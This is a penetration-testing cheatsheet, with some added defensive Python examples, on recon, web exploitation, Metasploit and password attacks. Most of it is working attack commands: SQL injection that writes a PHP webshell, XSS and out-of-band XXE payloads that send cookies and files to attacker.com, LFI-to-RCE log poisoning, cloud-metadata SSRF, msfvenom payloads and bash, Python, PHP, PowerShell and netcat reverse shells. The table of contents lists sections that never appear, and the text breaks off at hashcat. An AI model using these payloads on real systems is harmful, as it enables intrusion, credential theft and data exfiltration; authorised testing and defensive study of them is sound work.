Disclaimer: This cheatsheet is for authorised penetration testing and educational purposes only. Never use these techniques against systems you do not own or have explicit written permission to test.
Table of Contents
- OSINT & Recon
- Google Dorks
- Scanning & Enumeration
- Web Exploitation
- Network Exploitation
- Password Attacks
- Wordlists
- Post Exploitation
- Privilege Escalation — Linux
- Privilege Escalation — Windows
- Active Directory
- Pivoting & Tunnelling
OSINT & Recon
Passive DNS & Domain Recon
# WHOIS lookup — registrar, registration dates, contact info
whois target.com
# DNS enumeration — A, MX, NS, TXT records
dig target.com ANY
dig target.com MX
dig target.com TXT
# Reverse DNS lookup
dig -x 192.168.1.1
# Zone transfer attempt (often fails but always worth trying)
dig axfr @ns1.target.com target.com
# DNSrecon — comprehensive DNS enumeration
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr # zone transfer
dnsrecon -d target.com -t brt -D /usr/share/wordlists/dnsmap.txt # brute force subdomains
Subdomain Enumeration
# Sublist3r — passive subdomain enumeration via OSINT sources
sublist3r -d target.com
sublist3r -d target.com -o subdomains.txt
# Amass — thorough active and passive subdomain discovery
amass enum -d target.com
amass enum -active -d target.com -o amass_out.txt
# assetfinder — fast passive recon
assetfinder --subs-only target.com
# crt.sh — certificate transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq '.[].name_value' | sort -u
# Subfinder — fast passive subdomain discovery
subfinder -d target.com -o subfinder_out.txt
# ffuf — brute force subdomains using DNS wordlist
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://FUZZ.target.com -mc 200,301,302
Email & Employee Recon
# theHarvester — emails, subdomains, and hosts from public sources
theHarvester -d target.com -b all
theHarvester -d target.com -b google,linkedin,shodan
# Hunter.io (browser) — discover email format used at a company
# https://hunter.io/search/target.com
# Google dork — find employees on LinkedIn
# site:linkedin.com "target company" "engineer"
Shodan & Censys
# Shodan CLI — search for internet-exposed assets
shodan search 'org:"Target Company"'
shodan search 'hostname:target.com'
shodan search 'ssl.cert.subject.cn:target.com'
shodan host 192.168.1.1 # detailed info on a specific IP
# Useful Shodan filters
# port:22 org:"Target"
# product:"Apache httpd" country:"GB"
# http.title:"Dashboard" org:"Target"
Wayback Machine & Historical Recon
# gau — fetch all known URLs for a domain from various archives
gau target.com
gau target.com | grep "\.js$" # filter for JavaScript files
gau target.com | grep "\.php$" # filter for PHP endpoints
# waybackurls — pull historical URLs from the Wayback Machine
waybackurls target.com | tee wayback.txt
# Always check robots.txt and sitemap — often reveals hidden paths
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
Google Dorks
# Find login portals
site:target.com inurl:login
site:target.com inurl:admin
site:target.com intitle:"Login"
# Find exposed files by extension
site:target.com ext:pdf
site:target.com ext:xls OR ext:xlsx
site:target.com ext:sql
site:target.com ext:log
site:target.com ext:bak OR ext:backup
site:target.com ext:env
site:target.com ext:config
# Find open directory listings
site:target.com intitle:"index of"
site:target.com intitle:"index of /" "parent directory"
# Find sensitive info in exposed files
site:target.com "password" filetype:log
site:target.com "DB_PASSWORD" ext:env
site:target.com intext:"api_key" OR intext:"api key"
# Find config and source files
site:target.com ext:xml intext:"password"
site:target.com filetype:conf
site:target.com filetype:ini
# Search GitHub and Pastebin for leaks
site:github.com "target.com" password
site:pastebin.com "target.com"
# Find verbose error messages that reveal tech stack
site:target.com "SQL syntax"
site:target.com "Warning: mysql_"
site:target.com "Uncaught exception"
# Find exposed webcams and devices
inurl:/view/index.shtml # Axis cameras
intitle:"webcamXP 5"
intitle:"D-Link" inurl:8080
# Other useful combos
intitle:"admin panel" site:target.com
inurl:"phpinfo.php" site:target.com
inurl:"/wp-admin/" site:target.com
Scanning & Enumeration
Nmap
# Quick scan — top 1000 ports with service and script detection
nmap -sV -sC 10.10.10.1
# Full port scan — all 65535 ports
nmap -p- 10.10.10.1
# Stealth SYN scan with OS and version detection
nmap -sS -sV -O -Pn 10.10.10.1
# Aggressive scan — version, scripts, OS, and traceroute (noisy)
nmap -A 10.10.10.1
# UDP scan — slow but reveals SNMP, DNS, and other UDP services
nmap -sU --top-ports 100 10.10.10.1
# Ping sweep — discover live hosts on a subnet
nmap -sn 10.10.10.0/24
# Output to all formats (normal, XML, grepable)
nmap -sV -oA scan_results 10.10.10.1
# Run a specific NSE script
nmap --script=http-enum 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1
nmap --script=ftp-anon 10.10.10.1
# Firewall evasion techniques
nmap -f 10.10.10.1 # fragment packets
nmap -D RND:10 10.10.10.1 # decoy scan with random IPs
nmap --source-port 53 10.10.10.1 # spoof source port as DNS
Service-Specific Enumeration
FTP (21)
# Attempt anonymous login
ftp 10.10.10.1
# Username: anonymous / Password: (blank or any email)
# Nmap scripts — check for anonymous access and vulnerabilities
nmap --script=ftp-anon,ftp-bounce,ftp-syst 10.10.10.1
# Brute force FTP credentials
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.1
SSH (22)
# Banner grab — reveals exact version
nc -v 10.10.10.1 22
# Check which authentication methods are supported
ssh -v user@10.10.10.1
# Brute force SSH credentials
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P passwords.txt ssh://10.10.10.1
# Connect with a private key
ssh -i id_rsa user@10.10.10.1
SMTP (25)
# Connect and attempt user enumeration via VRFY / EXPN
nc -v 10.10.10.1 25
VRFY root
EXPN admin
# smtp-user-enum — automated SMTP user enumeration
smtp-user-enum -M VRFY -U users.txt -t 10.10.10.1
DNS (53)
# Zone transfer attempt — dumps all DNS records if misconfigured
dig axfr @10.10.10.1 target.com
# Reverse lookup
dig -x 10.10.10.1 @10.10.10.1
# Brute force DNS records
dnsenum --dnsserver 10.10.10.1 --enum target.com
SMB (139/445)
# List shares anonymously
smbclient -L //10.10.10.1 -N
smbmap -H 10.10.10.1
# Connect to a share
smbclient //10.10.10.1/share -N # null session
smbclient //10.10.10.1/share -U username # with credentials
# enum4linux / enum4linux-ng — full SMB/RPC enumeration
enum4linux -a 10.10.10.1
enum4linux-ng -A 10.10.10.1
# Nmap SMB scripts
nmap --script=smb-enum-shares,smb-enum-users 10.10.10.1
nmap --script=smb-vuln* 10.10.10.1 # check for EternalBlue etc.
# NetExec (replaces CrackMapExec)
netexec smb 10.10.10.1
netexec smb 10.10.10.1 -u user -p password --shares
SNMP (161 UDP)
# Walk the full MIB using the default community string
snmpwalk -v2c -c public 10.10.10.1
snmpwalk -v1 -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # retrieve hostname only
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.10.1
# snmp-check — cleaner, more readable SNMP output
snmp-check 10.10.10.1 -c public
LDAP (389)
# Anonymous bind — enumerate without credentials
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com"
ldapsearch -x -H ldap://10.10.10.1 -b "dc=target,dc=com" "(objectClass=*)"
# Authenticated LDAP query
ldapsearch -x -H ldap://10.10.10.1 -D "cn=admin,dc=target,dc=com" \
-w password -b "dc=target,dc=com"
Web Enumeration
# gobuster — directory brute force
gobuster dir -u http://10.10.10.1 \
-w /usr/share/seclists/Discovery/Web-Content/common.txt
# gobuster — virtual host brute force (find subdomains served by the same IP)
gobuster vhost -u "https://target.com" \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
--append-domain --no-tls-validation
# ffuf — directory brute force
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://10.10.10.1/FUZZ -mc 200,301,302,403
# ffuf — virtual host brute force (find subdomains via Host header fuzzing)
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-H "Host: FUZZ.target.com" -u http://10.10.10.1 -mc 200,301
# feroxbuster — recursive directory brute force
feroxbuster -u http://10.10.10.1 -w /usr/share/wordlists/dirb/common.txt
# Technology fingerprinting — identify the stack before attacking it
whatweb http://10.10.10.1
# Nikto — automated web vulnerability scanner
nikto -h http://10.10.10.1
# ffuf — brute force hidden GET parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/page?FUZZ=test -mc 200 -fs <baseline_size>
# ffuf — fuzz parameter values (e.g. find valid user IDs)
ffuf -w /usr/share/wordlists/rockyou.txt \
-u "http://10.10.10.1/page?id=FUZZ" -mc 200 -fs <baseline_size>
# ffuf — fuzz POST body parameters
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u http://10.10.10.1/login -X POST -d "FUZZ=test" \
-H "Content-Type: application/x-www-form-urlencoded" -mc 200
# ffuf — fuzz file extensions to find backup or alternate files
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt \
-u http://10.10.10.1/indexFUZZ -mc 200
# ffuf — authenticated directory brute force using a session cookie
ffuf -w wordlist.txt -u http://10.10.10.1/FUZZ \
-H "Cookie: session=abc123" -mc 200,301,302
Web Exploitation
SQL Injection
# Manual detection — inject into parameters and observe response changes
' OR 1=1-- -
' OR '1'='1
" OR "1"="1
') OR ('1'='1
# sqlmap — automated SQL injection detection and exploitation
sqlmap -u "http://target.com/page?id=1"
sqlmap -u "http://target.com/page?id=1" --dbs # list databases
sqlmap -u "http://target.com/page?id=1" -D dbname --tables # list tables in a DB
sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # dump a table
# sqlmap against a POST login form
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# sqlmap with session cookie (authenticated endpoint)
sqlmap -u "http://target.com/page" --cookie="session=abc123"
# sqlmap from a saved Burp Suite request file
sqlmap -r request.txt
# Boolean-based blind injection — compare true vs false responses
' AND 1=1-- - # true condition
' AND 1=2-- - # false condition — response differs
# Determine column count for UNION injection
' ORDER BY 1-- - # increment until error
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 1,2,3-- -
# MySQL — read a file from the server (requires FILE privilege)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL-- -
# MySQL — write a webshell (requires write access to web root)
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
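The injections above all work for the same reason: user input is spliced into the SQL text, so a quote closes the literal and the rest is parsed as SQL. The following is an added example, not part of the original cheatsheet, showing the vulnerable concatenation beside the parameterised fix on a constructed in-memory SQLite table (the `users` schema and rows are invented for the demo):

```python
import sqlite3

# Constructed in-memory stand-in for an application's users table (demo data only).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")],
    )
    return conn

def find_user_vulnerable(conn, username):
    # String interpolation: the input becomes part of the SQL grammar. With
    # "' OR 1=1-- -" the quote closes the literal, OR 1=1 makes the WHERE clause
    # true for every row, and "-- -" comments out the trailing quote.
    query = "SELECT id, username FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()

def find_user_safe(conn, username):
    # Parameter binding: the statement is compiled first and the value is bound
    # afterwards, so quotes, OR and comment sequences are only characters in a string.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()

def demo(payload="' OR 1=1-- -"):
    """Run the same payload through both versions and return the row sets."""
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, payload),  # every row comes back
        "safe": find_user_safe(conn, payload),              # no user has that literal name
        "legit": find_user_safe(conn, "alice"),             # normal lookups still work
    }
```

The same applies to the UNION and LOAD_FILE payloads: none of them reach the parser as SQL once the value is bound as a parameter, which is why parameterised queries (or a query builder that uses them) are the fix, not input blacklists.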
Cross-Site Scripting (XSS)
# Basic reflected XSS payloads — test in all input fields and URL parameters
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Cookie stealing — exfiltrate session cookies to attacker server
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
# Filter bypass payloads
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<iframe src="javascript:alert(1)">
"><script>alert(1)</script>
'><script>alert(1)</script>
File Inclusion
# Local File Inclusion (LFI) — read arbitrary files on the server
?page=../../../../etc/passwd
?file=....//....//....//etc/passwd # bypass ../ filter
?lang=php://filter/convert.base64-encode/resource=index.php # read PHP source as base64
# LFI to RCE via log poisoning
# 1. Inject PHP into the User-Agent header so it gets written to the access log:
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# 2. Include the log file to trigger execution:
?page=/var/log/apache2/access.log&cmd=id
# LFI to RCE via /proc/self/environ (older servers)
?page=/proc/self/environ&cmd=id
# Remote File Inclusion (RFI) — load and execute a remote file
?page=http://attacker.com/shell.php
# PHP wrappers for advanced LFI
?page=php://input # POST raw PHP code in request body
?page=data://text/plain,<?php system('id'); ?>
?page=expect://id
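Every payload in this section defeats a check that inspects the input string rather than the path it resolves to. The code below is an added example (not from the cheatsheet) of the defensive pattern: reject wrappers and absolute paths, resolve the candidate, then test containment on the result. `PAGES_ROOT` is an assumed document root, and `os.path.normpath` is used so the example runs offline; on a live system add `os.path.realpath` so symlinks under the root cannot point outside it.

```python
import os

# Assumed directory from which the application may include pages (hypothetical path).
PAGES_ROOT = "/var/www/app/pages"

def naive_strip_filter(value):
    # Single-pass removal of "../": the filter that "....//" is built to defeat.
    # After one pass the leftover characters re-form "../".
    return value.replace("../", "")

def resolve_include(page, root=PAGES_ROOT):
    """Return the absolute path to include, or raise ValueError.
    Checks the resolved path, not the input string."""
    if "://" in page:
        # php://, data://, expect://, http://: stream wrappers and remote includes
        raise ValueError("stream wrappers and URLs are not allowed")
    if os.path.isabs(page):
        # /var/log/apache2/access.log, /proc/self/environ and friends
        raise ValueError("absolute paths are not allowed")
    candidate = os.path.normpath(os.path.join(root, page))
    # commonpath is the containment test: the resolved path must still start at root
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the pages directory")
    return candidate

def classify(values):
    """Map each candidate value to True (would be included) or False (rejected)."""
    result = {}
    for v in values:
        try:
            resolve_include(v)
            result[v] = True
        except ValueError:
            result[v] = False
    return result
```

Note that the raw `....//` form is harmless to this check (it names a literal directory called `....`); it only becomes `../` after a strip filter rewrites it, which is exactly why resolving and then checking beats rewriting the input.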
Command Injection
# Basic injection characters — try all of these in input fields
; id
| id
|| id
&& id
`id`
$(id)
# Bypass space filters
cat${IFS}/etc/passwd # $IFS acts as a space
cat</etc/passwd
# Bypass character blacklists
w'h'o'am'i # break up the command with quotes
/bin/c?t /etc/passwd # use wildcards
$(printf "\x77\x68\x6f\x61\x6d\x69") # hex encode the command
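The bypass list above is the argument against blacklists: `${IFS}`, quoting, wildcards and `$(printf ...)` all slip past a filter that deletes a few metacharacters. The block below is an added example, not from the original cheatsheet, that scores the page's payload shapes against a naive blacklist and against the two defences that actually hold: an allowlist of what a hostname may look like, and passing the value as an argv element with `shell=False` so no shell ever re-parses it. The payload strings are constructed test input and nothing in them is executed.

```python
import re
import subprocess

# Payload shapes from the list above, constructed here as inert test input.
PAYLOADS = [
    "8.8.8.8; id", "8.8.8.8 | id", "8.8.8.8 || id", "8.8.8.8 && id", "`id`", "$(id)",
    "cat${IFS}/etc/passwd", "cat</etc/passwd", "w'h'o'am'i", "/bin/c?t /etc/passwd",
    '$(printf "\\x77\\x68\\x6f\\x61\\x6d\\x69")',
]

# Blacklist approach: delete a handful of shell metacharacters, then hand the rest to a shell.
BLACKLIST = set(";|& \t\n")

def blacklist_filter(value):
    return "".join(ch for ch in value if ch not in BLACKLIST)

def shell_command_after_blacklist(host):
    # What a shell=True call would receive. ${IFS}, quotes, wildcards and $(...)
    # pass the filter untouched, which is why the bypasses above work.
    return "ping -c 1 " + blacklist_filter(host)

# Allowlist approach: accept only a syntactically valid hostname or dotted IPv4 literal.
HOST_RE = re.compile(
    r"(?=.{1,253}\Z)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)

def allowlist_host(value):
    return HOST_RE.fullmatch(value) is not None

def ping_argv(host):
    # Validate, then build an argv list. With shell=False no program re-parses the
    # string, so metacharacters have no meaning even if the allowlist were looser.
    if not allowlist_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]

def run_ping(host):
    """Actually invoke ping for a validated host (not exercised by the demo)."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True,
                          timeout=10, check=False)

def evaluate(payloads=PAYLOADS):
    """For each payload: does the blacklist leave it unchanged, and does the allowlist reject it?"""
    return {
        p: {
            "unchanged_by_blacklist": blacklist_filter(p) == p,
            "rejected_by_allowlist": not allowlist_host(p),
        }
        for p in payloads
    }
```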
SSRF
SSRF (Server-Side Request Forgery) tricks the server into making HTTP requests on your behalf. Look for parameters that accept URLs or hostnames — url=, redirect=, fetch=, src=, path= etc. The goal is to reach internal services the server can talk to but you can’t directly.
# Target localhost to access internal-only services
url=http://localhost/admin
url=http://127.0.0.1:22 # probe internal ports — different response = port open
url=http://127.0.0.1:3306 # MySQL
url=http://127.0.0.1:6379 # Redis (often unauthenticated internally)
# Cloud metadata endpoints — extremely high value on AWS/GCP/Azure
url=http://169.254.169.254/latest/meta-data/ # AWS metadata
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ # AWS IAM keys
url=http://metadata.google.internal/computeMetadata/v1/ # GCP metadata
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure metadata
# Bypass filters that blacklist "127.0.0.1" or "localhost" as strings
url=http://2130706433/ # 127.0.0.1 as a decimal integer
url=http://0x7f000001/ # 127.0.0.1 as hex
url=http://127.1/ # shorthand notation
url=http://[::1]/ # IPv6 loopback
url=http://localtest.me/ # DNS that resolves to 127.0.0.1
# Use SSRF to probe the internal network
url=http://192.168.1.1/
url=http://10.0.0.1:8080/admin
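The filter-bypass forms above (decimal, hex, `127.1`, `[::1]`, a public name that resolves to loopback) all beat string comparison against "127.0.0.1" because the HTTP client parses the host differently from the filter. The following is an added example, not part of the cheatsheet, of the check that holds up: canonicalise the host to the addresses it will actually connect to, then reject loopback, private, link-local and other internal ranges. `legacy_ipv4` reproduces the inet_aton forms that the `ipaddress` module rejects; `FAKE_DNS` is a constructed name-to-address map so the example runs offline and stands in for a real resolver.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed name->address map so the example runs offline. In production this is a
# real DNS lookup, and every returned address (A and AAAA) must pass the check.
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "localtest.me": ["127.0.0.1"],
    "metadata.google.internal": ["169.254.169.254"],
    "example.com": ["93.184.216.34"],
}

_IPV4_PART = re.compile(r"^(?:0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.I)

def _part_value(p):
    if p[:2].lower() == "0x":
        return int(p, 16)
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)
    return int(p)

def legacy_ipv4(host):
    """Parse the inet_aton forms that ipaddress rejects but most HTTP clients accept:
    decimal (2130706433), hex (0x7f000001), octal, and fewer than four parts (127.1).
    Returns an IPv4Address or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_IPV4_PART.match(p) for p in parts):
        return None
    nums = [_part_value(p) for p in parts]
    head, last = nums[:-1], nums[-1]
    # inet_aton rule: leading parts are single bytes, the last part fills the remaining bytes
    if any(b > 255 for b in head) or last >= 1 << (8 * (4 - len(head))):
        return None
    value = last
    for i, b in enumerate(head):
        value |= b << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def canonical_addresses(host, resolver=FAKE_DNS):
    """Every IP address a request to `host` could actually reach."""
    host = host.lower()
    try:
        return [ipaddress.ip_address(host)]      # dotted-quad IPv4 or IPv6 literal
    except ValueError:
        pass
    legacy = legacy_ipv4(host)
    if legacy is not None:
        return [legacy]
    return [ipaddress.ip_address(a) for a in resolver.get(host, [])]

def is_internal(addr):
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                  # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

def is_safe_outbound_url(url, resolver=FAKE_DNS):
    """Allow only http(s) URLs whose host resolves exclusively to public addresses.
    Unresolvable hosts fail closed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addrs = canonical_addresses(parts.hostname, resolver)
    return bool(addrs) and not any(is_internal(a) for a in addrs)
```

Two caveats a reviewer should add: the address that passed the check must be the one the connection uses (resolve once and connect to that IP, or the name can change between check and use), and redirects must be re-checked, since a public host can 302 to `http://169.254.169.254/`.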
XXE
XXE (XML External Entity Injection) exploits XML parsers that process external entity declarations. When an app accepts XML input — SOAP requests, file uploads, API payloads — and the parser has external entities enabled, you can use it to read local files, probe internal services, or exfiltrate data out-of-band. Look for Content-Type: application/xml or text/xml in requests, and any file upload that accepts XML, SVG, DOCX, or XLSX formats.
<!-- Basic XXE — read a local file. Contents of /etc/passwd returned wherever &xxe; is rendered -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- SSRF via XXE — make the server reach an internal endpoint -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Blind XXE via Out-of-Band — when nothing is reflected in the response.
The server fetches your malicious DTD, which exfiltrates file contents to your server. -->
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfil;</root>
<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%exfiltrate;
<!-- XXE via SVG file upload — rename a crafted SVG and upload it -->
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg>&xxe;</svg>
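Every payload in this section depends on a DOCTYPE that declares entities, and none of the upload formats the text names (SVG, DOCX, XLSX content parts, API bodies) legitimately need one. The block below is an added example, not part of the cheatsheet, of a lexical pre-parse gate: it scans an uploaded document for DOCTYPE and entity declarations, reports what it finds (name, parameter entity, external `SYSTEM`/`PUBLIC` target) and rejects anything that carries them. The sample documents are constructed to mirror the shapes above; `dtd.example.invalid` is a placeholder host.

```python
import re

# Constructed samples mirroring the shapes above plus a benign SVG; hosts and paths
# are placeholders, not real endpoints.
XXE_FILE = ('<?xml version="1.0"?>\n<!DOCTYPE root [\n'
            '<!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n<root>&xxe;</root>')
XXE_OOB = ('<?xml version="1.0"?>\n<!DOCTYPE root [\n'
           '<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/evil.dtd">\n'
           '%dtd;\n]>\n<root>&exfil;</root>')
XXE_SVG = ('<?xml version="1.0"?>\n<!DOCTYPE svg [\n'
           '<!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n<svg>&xxe;</svg>')
BENIGN_SVG = ('<?xml version="1.0"?>\n<svg xmlns="http://www.w3.org/2000/svg" '
              'width="8" height="8"><rect width="8" height="8"/></svg>')

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name (SYSTEM "uri" | PUBLIC "pubid" "uri" | "literal value")>
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+"
    r"(?:(?P<kind>SYSTEM|PUBLIC)\s+(?:\"[^\"]*\"\s+)?[\"'](?P<uri>[^\"']*)[\"']"
    r"|(?P<literal>\"[^\"]*\"|'[^']*'))",
    re.I | re.S,
)
PARAM_REF_RE = re.compile(r"%[A-Za-z_][\w.-]*;")   # %dtd; style parameter entity use

def inspect_xml(doc):
    """Lexical scan of an XML document for the DTD constructs that enable XXE."""
    entities = []
    for m in ENTITY_RE.finditer(doc):
        entities.append({
            "name": m.group("name"),
            "parameter": m.group("param") is not None,   # <!ENTITY % ...> (blind/OOB style)
            "external": m.group("kind") is not None,     # SYSTEM/PUBLIC: fetches a file or URL
            "uri": m.group("uri"),
        })
    return {
        "doctype": DOCTYPE_RE.search(doc) is not None,
        "entities": entities,
        "param_refs": PARAM_REF_RE.findall(doc),
    }

def accept_upload(doc):
    """Policy for untrusted XML/SVG uploads: no DOCTYPE, no entity declarations, no
    parameter entity references. Reject before the document reaches a real parser."""
    r = inspect_xml(doc)
    return not r["doctype"] and not r["entities"] and not r["param_refs"]
```

This gate complements, rather than replaces, a safely configured parser (for example lxml's `XMLParser(resolve_entities=False)` or the `defusedxml` wrappers): the scan gives you a loggable finding for detection, and the parser setting makes sure nothing that slips past a regex is ever resolved.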
Network Exploitation
Metasploit
# Start Metasploit
msfconsole
# Search for modules by platform and type
search type:exploit platform:windows smb
search type:exploit platform:linux http
# Use a module and set required options
use exploit/path/to/module
show options
set RHOSTS 10.10.10.1
set LHOST 10.10.14.5
set LPORT 4444
run
# Common payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Generate standalone payloads with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f powershell
Reverse Shells
# Start a netcat listener on your machine first
nc -lvnp 4444
# Bash reverse shell
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP reverse shell
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# PowerShell reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Netcat reverse shell (where -e is supported)
nc -e /bin/sh 10.10.14.5 4444
# Netcat reverse shell (without -e, using mkfifo)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
# Upgrade a basic shell to a fully interactive TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → press Enter → export TERM=xterm
Responder — LLMNR/NBT-NS Poisoning
# Start Responder to capture NTLMv2 hashes on the local network
responder -I eth0 -rdwv
# Crack captured NTLMv2 hashes offline with hashcat
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Meterpreter
Once you have a Meterpreter shell via Metasploit, these are the commands you’ll reach for most:
# Core info gathering
sysinfo # OS, hostname, architecture
getuid # current user
getpid # current process ID
ps # list running processes
shell # drop into a system shell
# File operations
upload /local/file.exe C:\\Windows\\Temp\\file.exe
download C:\\Users\\user\\Desktop\\flag.txt /tmp/
ls
cd C:\\Users
cat file.txt
# Privilege escalation
getsystem # attempt automatic privesc via token impersonation
getuid # confirm if now SYSTEM
# Pivoting into internal networks
run autoroute -s 192.168.1.0/24 # add route to internal subnet
portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward a remote port to localhost
# Useful post-exploitation modules
run post/windows/gather/hashdump # dump local account hashes
run post/multi/recon/local_exploit_suggester # suggest local privesc exploits
run post/windows/manage/migrate # migrate to a more stable process
# Session management
background # background the current session
sessions -l # list all active sessions
sessions -i 1 # interact with session 1
Password Attacks
Wordlist Generation
# CeWL — generate a custom wordlist by crawling the target website
cewl http://target.com -d 3 -m 5 -w wordlist.txt
# Crunch — generate wordlists by character set and pattern
crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
crunch 6 6 -t @@@@%% -o wordlist.txt # 4 letters + 2 digits
# CUPP — generate targeted personal wordlists (names, birthdays, pets etc.)
cupp -i
Online Brute Force
# Hydra — versatile brute forcer supporting many protocols
hydra -l admin -P rockyou.txt 10.10.10.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
hydra -l root -P rockyou.txt ssh://10.10.10.1
hydra -L users.txt -P rockyou.txt ftp://10.10.10.1
hydra -l admin -P rockyou.txt 10.10.10.1 smb
# Medusa — alternative to Hydra
medusa -h 10.10.10.1 -u admin -P rockyou.txt -M http -m DIR:/admin
Offline Hash Cracking
# Hashcat — GPU-accelerated hash cracking
hashcat -m 0 hashes.txt rockyou.txt # MD5
hashcat -m 100 hashes.txt rockyou.txt # SHA1
